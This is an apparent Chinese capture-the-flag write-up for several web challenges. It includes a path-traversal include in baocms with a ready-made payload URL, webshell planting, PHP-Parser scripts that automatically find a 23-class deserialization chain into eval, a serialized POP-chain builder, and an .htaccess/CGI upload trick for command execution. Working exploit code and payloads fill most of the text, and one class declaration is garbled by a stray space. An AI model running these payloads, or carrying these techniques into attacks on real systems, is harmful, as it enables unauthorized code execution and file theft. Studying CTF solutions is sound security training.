Web

Hard_Penetration

用🐲👴的工具https://github.com/ccdr4gon/Dr4gonSword

真的很牛 直接注入内存🐎

连接到shell 扫内网端口 有8005

image.png

frp挂上代理访问是baocms

代码https://github.com/IsCrazyCat/demo-baocms-v17.1

漫长的代码审计后

在Tudou/Lib/barcodegen/html/image.php处找到文件包含漏洞

<?php
if(isset($_GET['code'], $_GET['t'], $_GET['r'], $_GET['rot'], $_GET['text'], $_GET['f1'], $_GET['f2'], $_GET['o'], $_GET['dpi'], $_GET['a1'], $_GET['a2'])) {
require('config.php');
require($class_dir . '/BCGColor.php');
require($class_dir . '/BCGBarcode.php');
require($class_dir . '/BCGDrawing.php');
require($class_dir . '/BCGFont.php');
if(include($class_dir . '/BCG' . $_GET['code'] . '.barcode.php')) {
if($_GET['f1'] !== '0' && $_GET['f1'] !== '-1' && intval($_GET['f2']) >= 1) {
$font = new BCGFont($class_dir . '/font/' . $_GET['f1'], intval($_GET['f2']));
} else {
$font = 0;
}
$color_black = new BCGColor(0, 0, 0);
$color_white = new BCGColor(255, 255, 255);
$codebar = 'BCG' . $_GET['code'];
$code_generated = new $codebar();
if(isset($_GET['a1']) && intval($_GET['a1']) === 1) {
$code_generated->setChecksum(true);
}
.......

利用:

`$_GET['code']` 没有经过任何过滤就被拼进了 `include($class_dir . '/BCG' . $_GET['code'] . '.barcode.php')`:前缀 `BCG` 和后缀 `.barcode.php` 虽然写死,但 `code` 里可以带 `../`,所以包含的路径可以穿越到任意目录,只要目标目录下存在一个名为 `.barcode.php` 的文件即可。前面通过内存马已经拿到了 shell,于是先在 /tmp 下创建 `.barcode.php` 写入一句话木马,再用 `code=/../../../../../../../../../../tmp/` 把它包含进来(同一个 `code` 之后还会拼进 `new $codebar()`,类不存在会报错,但此时被包含的文件已经执行完毕,不影响利用)。

然后构造利用即可

image.png

payload:

127.0.0.1:8005/Tudou/Lib/barcodegen/html/image.php?code=/../../../../../../../../../../tmp/&t=1&r=1&rot=1&text=1&f1=1&f2=1&o=1&dpi=1&a1=1&a2=1&neo=system('cat /flag');

pop_master

一万个类找 POP 链

用 PHP-Parser 解析 AST,筛出“可用”的类:方法体里在调用下一个对象的方法(或 `eval`)之前,参数没有被形如 `$param = ...` 的语句(或 for 循环体首句)整个重新赋值——被覆盖的话 payload 就传不下去。注意包在 `if` 里的赋值不会被这个过滤器识别,所以链上会混进几处给参数追加后缀的类,后面用 `?>` 处理。

https://github.com/nikic/PHP-Parser

ast.php

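<?php
// ast.php: parse the challenge's class.php once and collect, for every method, which method
// (or eval) it calls and whether its first parameter still holds the caller's value at that
// point.  Namespace separators are single backslashes; the doubled "\\" in the page listing
// was an escaping artifact and would not parse.
use PhpParser\Error;
use PhpParser\ParserFactory;
use PhpParser\Node;
use PhpParser\NodeVisitorAbstract;
use PhpParser\NodeTraverser;

require './vendor/autoload.php';

$code = file_get_contents('./class.php');
if ($code === false) {
    fwrite(STDERR, "cannot read ./class.php\n");
    return;
}

$parser = (new ParserFactory)->create(ParserFactory::PREFER_PHP7);

try {
    $ast = $parser->parse($code);
} catch (Error $error) {
    // Must be PhpParser\Error (imported above): the original's bare `Error` was the global
    // \Error class, so a genuine parse failure would have propagated uncaught.
    echo "Parse error: {$error->getMessage()}\n";
    return;
}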

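/**
 * Decide whether the statement preceding a call leaves the method's first parameter intact.
 *
 * Returns false when $stmt — or, for a `for` loop, the first statement of its body — assigns
 * directly to the parameter variable, because the payload handed down the chain would then
 * be overwritten before the call.  Assignments nested in `if` blocks are deliberately not
 * inspected (the original did not either); they only append suffixes in this challenge.
 *
 * @param Node\Stmt             $stmt   statement immediately before the call being recorded
 * @param Node\Stmt\ClassMethod $method method that contains it
 */
function filter(Node\Stmt $stmt, Node\Stmt\ClassMethod $method): bool {
    if (empty($method->params)) {
        return true;   // no parameter to clobber
    }
    $param = $method->params[0]->var->name;

    $assignsParam = function ($s) use ($param): bool {
        return $s instanceof Node\Stmt\Expression
            && $s->expr instanceof Node\Expr\Assign
            && $s->expr->var instanceof Node\Expr\Variable
            && $s->expr->var->name == $param;
    };

    if ($assignsParam($stmt)) {
        return false;
    }
    if ($stmt instanceof Node\Stmt\For_ && isset($stmt->stmts[0]) && $assignsParam($stmt->stmts[0])) {
        return false;
    }
    return true;
}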

// Four parallel tables with one row per recorded call site (filled in by the visitor below):
// owning class, method, callee name (or the literal 'eval'), and whether the method's
// parameter survives unmodified up to that call.
$classes = [];
$methods = [];
$calleds = [];
$available = [];

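$traverser = new NodeTraverser();
$traverser->addVisitor(new class extends NodeVisitorAbstract {
    /** Append one call-site row to the four parallel global tables. */
    private function record(string $class, string $method, string $called, bool $avail): void {
        global $classes, $methods, $calleds, $available;
        $classes[] = $class;
        $methods[] = $method;
        $calleds[] = $called;
        $available[] = $avail;
    }

    /**
     * For every method of every class, record each `$this->prop->m(...)` call and each
     * `eval(...)`, together with whether the statement in front of it clobbers the parameter
     * (see filter()).  Calls inside an `if` — the method_exists() guards of this challenge —
     * are recorded too; for those the clobber check looks at the method's first statement.
     */
    public function enterNode(Node $node) {
        if (!($node instanceof Node\Stmt\Class_)) {
            return null;
        }
        $cls = $node->name->toString();
        foreach ($node->getMethods() as $method) {
            $name = $method->name->toString();
            // Abstract methods have no body (stmts === null); nothing to record for them.
            foreach ($method->stmts ?? [] as $key => $stmt) {
                $prevOk = $key > 0 ? filter($method->stmts[$key - 1], $method) : true;

                if ($stmt instanceof Node\Stmt\Expression) {
                    if ($stmt->expr instanceof Node\Expr\MethodCall) {
                        // NOTE(review): MethodCall::name is an Expr for `$obj->$dyn()`; skip those
                        // rather than crash on toString().
                        if ($stmt->expr->name instanceof Node\Identifier) {
                            $this->record($cls, $name, $stmt->expr->name->toString(), $prevOk);
                        }
                    } else if ($stmt->expr instanceof Node\Expr\Eval_) {
                        $this->record($cls, $name, 'eval', $prevOk);
                    }
                } else if ($stmt instanceof Node\Stmt\If_
                        && isset($stmt->stmts[0])
                        && $stmt->stmts[0] instanceof Node\Stmt\Expression
                        && $stmt->stmts[0]->expr instanceof Node\Expr\MethodCall
                        && $stmt->stmts[0]->expr->name instanceof Node\Identifier) {
                    // Original logic: key 1 -> check stmts[0]; key 2 -> check stmts[0] (skipping
                    // the sibling `if`); anything else is treated as available.
                    $avail = ($key == 1 || $key == 2) ? filter($method->stmts[0], $method) : true;
                    $this->record($cls, $name, $stmt->stmts[0]->expr->name->toString(), $avail);
                }
            }
        }
        return null;
    }
});
$ast = $traverser->traverse($ast);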

构造二叉树找可用链

find.php

<?php
// find.php: walk the static call graph that ast.php collected, starting from the entry
// gadget, until a path ending in eval() is found.  ast.php parses class.php and fills the
// global $classes/$methods/$calleds/$available tables used below.
require 'ast.php';

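/**
 * One node of the call tree explored by find(): a gadget class/method pair.
 *
 * left/right hold the (up to two) callees that ast.php recorded for this method; they are
 * nullable and default to null so that reading an unexplored side does not throw the
 * "must not be accessed before initialization" Error that the original typed-but-unset
 * properties raised.
 */
class FindNode {
    public string $class;
    public string $method;
    // true when the method's parameter reaches its outgoing call unmodified (see filter()).
    public bool $available;

    public ?FindNode $left = null;
    public ?FindNode $right = null;
    public ?FindNode $parent = null;

    /**
     * @param string $class     gadget class name
     * @param string $method    method name on that class
     * @param bool   $available whether the parameter survives to the outgoing call
     */
    public function __construct(string $class, string $method, bool $available) {
        $this->class = $class;
        $this->method = $method;
        $this->available = $available;
    }
}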

$eval = array();

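/**
 * Depth-first search from $node along the recorded call graph, appending every node whose
 * call is a reachable eval() to the global $eval list.
 *
 * Fixes over the original: a method with no recorded call site no longer indexes the tables
 * with a missing key (which silently turned into row 0 and recursed into an unrelated
 * class); a callee that is not in the tables is skipped instead of being looked up as row 0
 * (array_search() returns false); and a callee already on the current path is not followed,
 * so a cycle in the call graph cannot recurse forever.  At most two call sites are followed
 * (the two method_exists() branches), stored as left and right.
 */
function find(FindNode $node) {
    global $eval;
    global $classes, $methods, $calleds, $available;

    if (!$node->available) {
        return;
    }

    // One entry per call site that ast.php recorded for this method name.
    $keys = array_keys($methods, $node->method);
    if (empty($keys)) {
        return;   // dead end: the method calls nothing we track
    }

    foreach (array_slice($keys, 0, 2) as $i => $key) {
        $called = $calleds[$key];

        if ($called == 'eval') {
            if ($available[$key]) {
                array_push($eval, $node);
            }
            continue;
        }

        $called_key = array_search($called, $methods);
        if ($called_key === false) {
            continue;   // callee not recorded anywhere
        }

        // Cycle guard: never re-enter a method that is already an ancestor on this path.
        for ($anc = $node; $anc !== null; $anc = $anc->parent) {
            if ($anc->method === $called) {
                continue 2;
            }
        }

        $child = new FindNode($classes[$called_key], $called, $available[$called_key]);
        $child->parent = $node;
        if ($i == 0) {
            $node->left = $child;
        } else {
            $node->right = $child;
        }
        find($child);
    }
}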

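// Entry gadget: BSatHY is the method the target invokes on the unserialized object; its class
// is looked up from the tables.  (A top-level `global` statement is a no-op and was dropped.)
$root = new FindNode('', 'BSatHY', true);
$root_key = array_search($root->method, $methods);
if ($root_key === false) {
    fwrite(STDERR, "entry method {$root->method} not found in class.php\n");
    exit(1);
}
$root->class = $classes[$root_key];
find($root);

if (empty($eval)) {
    // The original read $eval[0] unconditionally and pop.php then iterated an undefined list.
    fwrite(STDERR, "no chain from {$root->method} to eval() found\n");
    exit(1);
}

// Walk from the first eval() endpoint back up to the root, then flip into call order.
$success_classes = array();
$success_methods = array();
for ($last = $eval[0]; $last !== null; $last = $last->parent) {
    array_push($success_classes, $last->class);
    array_push($success_methods, $last->method);
}

$success_classes = array_reverse($success_classes);
$success_methods = array_reverse($success_methods);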

再把链上的类导出来手写序列化

pop.php

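<?php
// pop.php: take the chain computed by find.php ($success_classes / $success_methods, in call
// order), cut every class down to the one method that is on the chain, and pretty-print the
// result to test.php so the payload can be built against a readable copy.
require 'find.php';

use PhpParser\Error;
use PhpParser\ParserFactory;
use PhpParser\Node;
use PhpParser\NodeFinder;
use PhpParser\PrettyPrinter;

require './vendor/autoload.php';

$code = file_get_contents('./class.php');
if ($code === false) {
    fwrite(STDERR, "cannot read ./class.php\n");
    return;
}

$parser = (new ParserFactory)->create(ParserFactory::PREFER_PHP7);

try {
    $ast = $parser->parse($code);
} catch (Error $error) {
    // PhpParser\Error, not the global \Error (the original's bare `Error` never matched).
    echo "Parse error: {$error->getMessage()}\n";
    return;
}

$nodeFinder = new NodeFinder();
$result = array();

foreach ($success_classes as $key => $name) {
    echo $name . " " . $success_methods[$key] . "\n";
    $class = $nodeFinder->findFirst($ast, function(Node $node) use ($name) {
        return $node instanceof Node\Stmt\Class_
            && $node->name->toString() === $name;
    });
    if ($class instanceof Node\Stmt\Class_) {
        // Keep only chain methods.  The original called array_splice() inside a foreach over
        // the same array; each removal re-indexes it, so later offsets pointed at the wrong
        // statement.  Filtering into a fresh array has no such drift.
        $class->stmts = array_values(array_filter(
            $class->stmts,
            function (Node $stmt) use ($success_methods): bool {
                return !($stmt instanceof Node\Stmt\ClassMethod)
                    || in_array($stmt->name->toString(), $success_methods, true);
            }
        ));
        array_push($result, $class);
    }
}

$prettyPrinter = new PrettyPrinter\Standard;
file_put_contents("test.php", $prettyPrinter->prettyPrintFile($result) . "\n");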

test.php

<?php

// Gadget 1 (entry point of the chain): $ErltTLc holds the next gadget and is attacker-set
// through unserialize().
class HdeuDP
{
    public $ErltTLc;
    // Forwards $kECoG unchanged to ErltTLc->GGWZSI() (the branch the chain uses) or ->mymqzK().
    // The dynamic-property write on the first line does not touch the argument.
    public function BSatHY($kECoG)
    {
        $this->qSvVG = "EOqvO";
        if (method_exists($this->ErltTLc, 'GGWZSI')) {
            $this->ErltTLc->GGWZSI($kECoG);
        }
        if (method_exists($this->ErltTLc, 'mymqzK')) {
            $this->ErltTLc->mymqzK($kECoG);
        }
    }
}
// Gadget 2: next gadget in $sQ9iP8M.
class vwR9vW
{
    public $sQ9iP8M;
    // The loop only copies $sxXmz into a throw-away local, so the argument is forwarded intact
    // to sQ9iP8M->Ez1w4x() (chain branch) or ->XstiKs().
    public function GGWZSI($sxXmz)
    {
        for ($i = 0; $i < 24; $i++) {
            $aMHmsA = $sxXmz;
        }
        if (method_exists($this->sQ9iP8M, 'Ez1w4x')) {
            $this->sQ9iP8M->Ez1w4x($sxXmz);
        }
        if (method_exists($this->sQ9iP8M, 'XstiKs')) {
            $this->sQ9iP8M->XstiKs($sxXmz);
        }
    }
}
// Gadget 3: next gadget in $qsDrtNG.
class sg2RxY
{
    public $qsDrtNG;
    // 11792 > 19530 is false, so the suffix is never appended; the call is unconditional.
    public function Ez1w4x($BoGtf)
    {
        if (11792 > 19530) {
            $BoGtf = $BoGtf . 'WznaW';
        }
        $this->qsDrtNG->xOBpW0($BoGtf);
    }
}
// Gadget 4: next gadget in $VGhzS66.
class M4LuGl
{
    public $VGhzS66;
    // Forwards $mcFiQ intact to VGhzS66->yTEURN() (chain branch) or ->cniDX8().
    public function xOBpW0($mcFiQ)
    {
        $this->BO10G = "NU4C7";
        if (method_exists($this->VGhzS66, 'yTEURN')) {
            $this->VGhzS66->yTEURN($mcFiQ);
        }
        if (method_exists($this->VGhzS66, 'cniDX8')) {
            $this->VGhzS66->cniDX8($mcFiQ);
        }
    }
}
// Gadget 5: next gadget in $tgW2UXg.
class rHZfcN
{
    public $tgW2UXg;
    // Forwards $WSoPF intact to tgW2UXg->y02y08() (chain branch) or ->qVbCki().
    public function yTEURN($WSoPF)
    {
        $this->YXdVB = "MVTKA";
        if (method_exists($this->tgW2UXg, 'y02y08')) {
            $this->tgW2UXg->y02y08($WSoPF);
        }
        if (method_exists($this->tgW2UXg, 'qVbCki')) {
            $this->tgW2UXg->qVbCki($WSoPF);
        }
    }
}
// Gadget 6: next gadget in $c1WX5it; single unconditional call.
class gxx6av
{
    public $c1WX5it;
    public function y02y08($fX0aQ)
    {
        $this->eK6np = "kN0IB";
        $this->c1WX5it->r6LtQG($fX0aQ);
    }
}
// Gadget 7: next gadget in $qZfI0OC.
class L0UPus
{
    public $qZfI0OC;
    // Forwards $BFESf intact to qZfI0OC->QF8XY1() (chain branch) or ->LuSdbh().
    public function r6LtQG($BFESf)
    {
        $this->rg5UW = "zos3T";
        if (method_exists($this->qZfI0OC, 'QF8XY1')) {
            $this->qZfI0OC->QF8XY1($BFESf);
        }
        if (method_exists($this->qZfI0OC, 'LuSdbh')) {
            $this->qZfI0OC->LuSdbh($BFESf);
        }
    }
}
// Gadget 8: next gadget in $lB9b5G5.
class K7VNu5
{
    public $lB9b5G5;
    // Loop copies into a throw-away local; argument reaches lB9b5G5->zD7lbq() or ->IpkWxX()
    // unchanged.  The chain continues through the second branch (IpkWxX).
    public function QF8XY1($AGE10)
    {
        for ($i = 0; $i < 9; $i++) {
            $ayzdYg = $AGE10;
        }
        if (method_exists($this->lB9b5G5, 'zD7lbq')) {
            $this->lB9b5G5->zD7lbq($AGE10);
        }
        if (method_exists($this->lB9b5G5, 'IpkWxX')) {
            $this->lB9b5G5->IpkWxX($AGE10);
        }
    }
}
// Gadget 9: next gadget in $xCsxdh5.
class T5mH7X
{
    public $xCsxdh5;
    // Forwards $PEvGe intact to xCsxdh5->EKr4ag() (chain branch) or ->t4SIVr().
    public function IpkWxX($PEvGe)
    {
        $this->voWr3 = "Nz8vn";
        if (method_exists($this->xCsxdh5, 'EKr4ag')) {
            $this->xCsxdh5->EKr4ag($PEvGe);
        }
        if (method_exists($this->xCsxdh5, 't4SIVr')) {
            $this->xCsxdh5->t4SIVr($PEvGe);
        }
    }
}
// Gadget 10: next gadget in $FigpmfG; single unconditional call.
class lwmggy
{
    public $FigpmfG;
    public function EKr4ag($gKFKp)
    {
        $this->Tiwg9 = "IRavG";
        $this->FigpmfG->lhtmWT($gKFKp);
    }
}
// Gadget 11: next gadget in $u0ma7My.
class X1Bmbb
{
    public $u0ma7My;
    // Loop copies into a throw-away local; argument reaches u0ma7My->s7F8zs() (chain branch)
    // or ->nhN1A7() unchanged.
    public function lhtmWT($ezg5D)
    {
        for ($i = 0; $i < 16; $i++) {
            $aQI2GP = $ezg5D;
        }
        if (method_exists($this->u0ma7My, 's7F8zs')) {
            $this->u0ma7My->s7F8zs($ezg5D);
        }
        if (method_exists($this->u0ma7My, 'nhN1A7')) {
            $this->u0ma7My->nhN1A7($ezg5D);
        }
    }
}
// Gadget 12: next gadget in $vfg35pV.
class sNyaIR
{
    public $vfg35pV;
    // Loop copies into a throw-away local; the chain continues through the second branch
    // (vfg35pV->DZP5my()).
    public function s7F8zs($aK86k)
    {
        for ($i = 0; $i < 39; $i++) {
            $aFU8Tr = $aK86k;
        }
        if (method_exists($this->vfg35pV, 'WfmYgs')) {
            $this->vfg35pV->WfmYgs($aK86k);
        }
        if (method_exists($this->vfg35pV, 'DZP5my')) {
            $this->vfg35pV->DZP5my($aK86k);
        }
    }
}
// Gadget 13: next gadget in $aa1YDXx.
class L4F0o0
{
    public $aa1YDXx;
    // 7225 > 51042 is false, so no suffix is appended; the chain continues through the second
    // branch (aa1YDXx->mG4Y4e()).
    public function DZP5my($cRuqt)
    {
        if (7225 > 51042) {
            $cRuqt = $cRuqt . 'LPfyp';
        }
        if (method_exists($this->aa1YDXx, 'sFvdtP')) {
            $this->aa1YDXx->sFvdtP($cRuqt);
        }
        if (method_exists($this->aa1YDXx, 'mG4Y4e')) {
            $this->aa1YDXx->mG4Y4e($cRuqt);
        }
    }
}
// Gadget 14: next gadget in $lZCvTCa; loop is a no-op copy, call is unconditional.
class zrVAgB
{
    public $lZCvTCa;
    public function mG4Y4e($pGHYR)
    {
        for ($i = 0; $i < 5; $i++) {
            $aBwmWS = $pGHYR;
        }
        $this->lZCvTCa->ruF6g1($pGHYR);
    }
}
// Gadget 15: next gadget in $cO81cFh; single unconditional call.
class DcdRXA
{
    public $cO81cFh;
    public function ruF6g1($NdPP4)
    {
        $this->wqFxW = "TdA1L";
        $this->cO81cFh->DOqAB2($NdPP4);
    }
}
// Gadget 16: next gadget in $VqvWTUF; loop is a no-op copy, call is unconditional.
class R9VkbV
{
    public $VqvWTUF;
    public function DOqAB2($FtEHV)
    {
        for ($i = 0; $i < 24; $i++) {
            $ad1M6I = $FtEHV;
        }
        $this->VqvWTUF->dgzpEV($FtEHV);
    }
}
// Gadget 17: next gadget in $cgQkf6v.
class m2oL58
{
    public $cgQkf6v;
    // 20744 > 30587 is false, so no suffix is appended; forwards to cgQkf6v->x62I2C()
    // (chain branch) or ->K8gDPQ().
    public function dgzpEV($XSe7m)
    {
        if (20744 > 30587) {
            $XSe7m = $XSe7m . 'ATBgs';
        }
        if (method_exists($this->cgQkf6v, 'x62I2C')) {
            $this->cgQkf6v->x62I2C($XSe7m);
        }
        if (method_exists($this->cgQkf6v, 'K8gDPQ')) {
            $this->cgQkf6v->K8gDPQ($XSe7m);
        }
    }
}
// Gadget 18: next gadget in $FS7bzT6.
class CIecTW
{
    public $FS7bzT6;
    // Forwards $M1qEC intact to FS7bzT6->yXQG7A() (chain branch) or ->yRo7eg().
    public function x62I2C($M1qEC)
    {
        $this->vLssi = "K9Muh";
        if (method_exists($this->FS7bzT6, 'yXQG7A')) {
            $this->FS7bzT6->yXQG7A($M1qEC);
        }
        if (method_exists($this->FS7bzT6, 'yRo7eg')) {
            $this->FS7bzT6->yRo7eg($M1qEC);
        }
    }
}
// Gadget 19: next gadget in $uklXnxo.
class bSaDnb
{
    public $uklXnxo;
    // 51752 > 21391 is TRUE: 'cpuNP' is appended to the payload before it is passed on.
    // This is one of the suffixes the final `?>` in the payload has to neutralise.
    public function yXQG7A($GWO3a)
    {
        if (51752 > 21391) {
            $GWO3a = $GWO3a . 'cpuNP';
        }
        $this->uklXnxo->kuHG2i($GWO3a);
    }
}
// Gadget 20: next gadget in $ybeKnmY.
class PTCzfW
{
    public $ybe KnmY;
    // 37307 > 17647 is TRUE: 'RlYLu' is appended to the payload before it is forwarded to
    // ybeKnmY->VT42cE() (chain branch) or ->dBbWYC().
    public function kuHG2i($nW6E9)
    {
        if (37307 > 17647) {
            $nW6E9 = $nW6E9 . 'RlYLu';
        }
        if (method_exists($this->ybeKnmY, 'VT42cE')) {
            $this->ybeKnmY->VT42cE($nW6E9);
        }
        if (method_exists($this->ybeKnmY, 'dBbWYC')) {
            $this->ybeKnmY->dBbWYC($nW6E9);
        }
    }
}
// Gadget 21: next gadget in $tpdAnk7.
class DEGn5X
{
    public $tpdAnk7;
    // Forwards $PnvsO intact to tpdAnk7->aAoOwi() (chain branch) or ->EtmH03().
    public function VT42cE($PnvsO)
    {
        $this->FKGiG = "hg0tc";
        if (method_exists($this->tpdAnk7, 'aAoOwi')) {
            $this->tpdAnk7->aAoOwi($PnvsO);
        }
        if (method_exists($this->tpdAnk7, 'EtmH03')) {
            $this->tpdAnk7->EtmH03($PnvsO);
        }
    }
}
// Gadget 22: next gadget in $t43nVRQ.
class vzURHs
{
    public $t43nVRQ;
    // Loop is a single no-op copy; forwards to t43nVRQ->Lgtm7z() (chain branch) or ->vHOZvc().
    public function aAoOwi($Pe6pd)
    {
        for ($i = 0; $i < 1; $i++) {
            $aQBlnL = $Pe6pd;
        }
        if (method_exists($this->t43nVRQ, 'Lgtm7z')) {
            $this->t43nVRQ->Lgtm7z($Pe6pd);
        }
        if (method_exists($this->t43nVRQ, 'vHOZvc')) {
            $this->t43nVRQ->vHOZvc($Pe6pd);
        }
    }
}
// Gadget 23 — the sink.  $vv0iwPE is unused by the chain.
class y93b0L
{
    public $vv0iwPE;
    // 58621 > 27135 is TRUE, so 'oDbtW' is appended and the string is eval()'d.  Together with
    // the two earlier suffixes the evaluated code ends in "cpuNPRlYLuoDbtW", which is why the
    // payload closes PHP mode with `?>` first.
    public function Lgtm7z($qoKDy)
    {
        if (58621 > 27135) {
            $qoKDy = $qoKDy . 'oDbtW';
        }
        eval($qoKDy);
    }
}

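// The chain in call order: each gadget stores the next one in the named property, and the
// last class (y93b0L) is the eval() sink with no outgoing property.  Building it from a table
// replaces the 22 ever-longer property paths with one loop; the object graph — and therefore
// serialize()'s output — is the same.
$chain = [
    ['HdeuDP', 'ErltTLc'],
    ['vwR9vW', 'sQ9iP8M'],
    ['sg2RxY', 'qsDrtNG'],
    ['M4LuGl', 'VGhzS66'],
    ['rHZfcN', 'tgW2UXg'],
    ['gxx6av', 'c1WX5it'],
    ['L0UPus', 'qZfI0OC'],
    ['K7VNu5', 'lB9b5G5'],
    ['T5mH7X', 'xCsxdh5'],
    ['lwmggy', 'FigpmfG'],
    ['X1Bmbb', 'u0ma7My'],
    ['sNyaIR', 'vfg35pV'],
    ['L4F0o0', 'aa1YDXx'],
    ['zrVAgB', 'lZCvTCa'],
    ['DcdRXA', 'cO81cFh'],
    ['R9VkbV', 'VqvWTUF'],
    ['m2oL58', 'cgQkf6v'],
    ['CIecTW', 'FS7bzT6'],
    ['bSaDnb', 'uklXnxo'],
    ['PTCzfW', 'ybeKnmY'],
    ['DEGn5X', 'tpdAnk7'],
    ['vzURHs', 't43nVRQ'],
    ['y93b0L', null],
];

// Link from the sink backwards so every object is complete before it is attached to its parent.
$next = null;
foreach (array_reverse($chain) as [$cls, $prop]) {
    $obj = new $cls();
    if ($prop !== null) {
        $obj->$prop = $next;
    }
    $next = $obj;
}
$test = $next;

echo serialize($test);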

链上有三个类(bSaDnb、PTCzfW、y93b0L)的 `if` 条件恒真,会依次给参数追加 `'cpuNP'`、`'RlYLu'`、`'oDbtW'`,所以最终 `eval()` 到的字符串是 payload 加上这串后缀。在 payload 末尾加 `?>` 退出 PHP 模式,后缀就只会作为普通文本被输出,而不会造成语法错误。

argv=system('cat /flag');?>

[强网先锋]赌徒

构造反序列化链读 /flag

// POP chain for the 赌徒 challenge, built inside-out: Start -> Info -> Room -> Room, with the
// innermost Room carrying the path to read ('/flag').  The classes come from the challenge
// source; the resulting object graph is what gets serialize()d and sent.
$reader = new Room();
$reader->filename = '/flag';

$wrapper = new Room();
$wrapper->a = $reader;

$info = new Info();
$info->file = array('filename' => $wrapper);

$h = new Start();
$h->name = $info;

[强网先锋]寻宝

key1:

image.png

key2:

image.png

分别输入进去就行

EasyWeb

扫目录

http://121.42.242.238/files

image.png

hint.txt

Try to scan 35000-40000 ^_^.
All tables are empty except for the table where the username and password are located
Table: employee

exp.py

import os

# Decoy script served from the target's /files listing (alongside hint.txt and the fake
# www.zip): all it does is echo the word "flag" through the shell.
DECOY_COMMAND = "echo 'flag';"
os.system(DECOY_COMMAND)

www.zip

It's fake.

扫出端口是36842

是登录页面,按 hint 从 employee 表注出 admin 的凭据(下面第二行是 32 位十六进制串,像是 MD5 哈希;若登录需要明文,还得先查表还原)

admin
99f609527226e076d668668582ac4420

.htaccess

Options +ExecCGI
AddHandler cgi-script .xx

再上传 youname.xx(文件名任意,扩展名 `.xx` 与 .htaccess 里的 `AddHandler cgi-script .xx` 对应;`Options +ExecCGI` 允许在该目录执行 CGI,所以访问这个文件时 Apache 会把它当 CGI 程序运行——前提是目标允许 .htaccess 覆盖这两项配置。CGI 脚本必须先输出 Content-type 头和一个空行,之后的标准输出才是响应体)

#! /bin/sh
# Minimal CGI script: once the uploaded .htaccess maps *.xx to cgi-script, Apache runs this
# on request.  A CGI response is the header line, a blank line, then the body — here the
# output of whoami, which shows which user the web server executes uploads as.
printf 'Content-type: text/html\n\n'
whoami

image.png

根目录有 flag 无权限

127.0.0.1:8006 有 jboss 4.0.2

frp 反代出来传个 jsp 一句话读 flag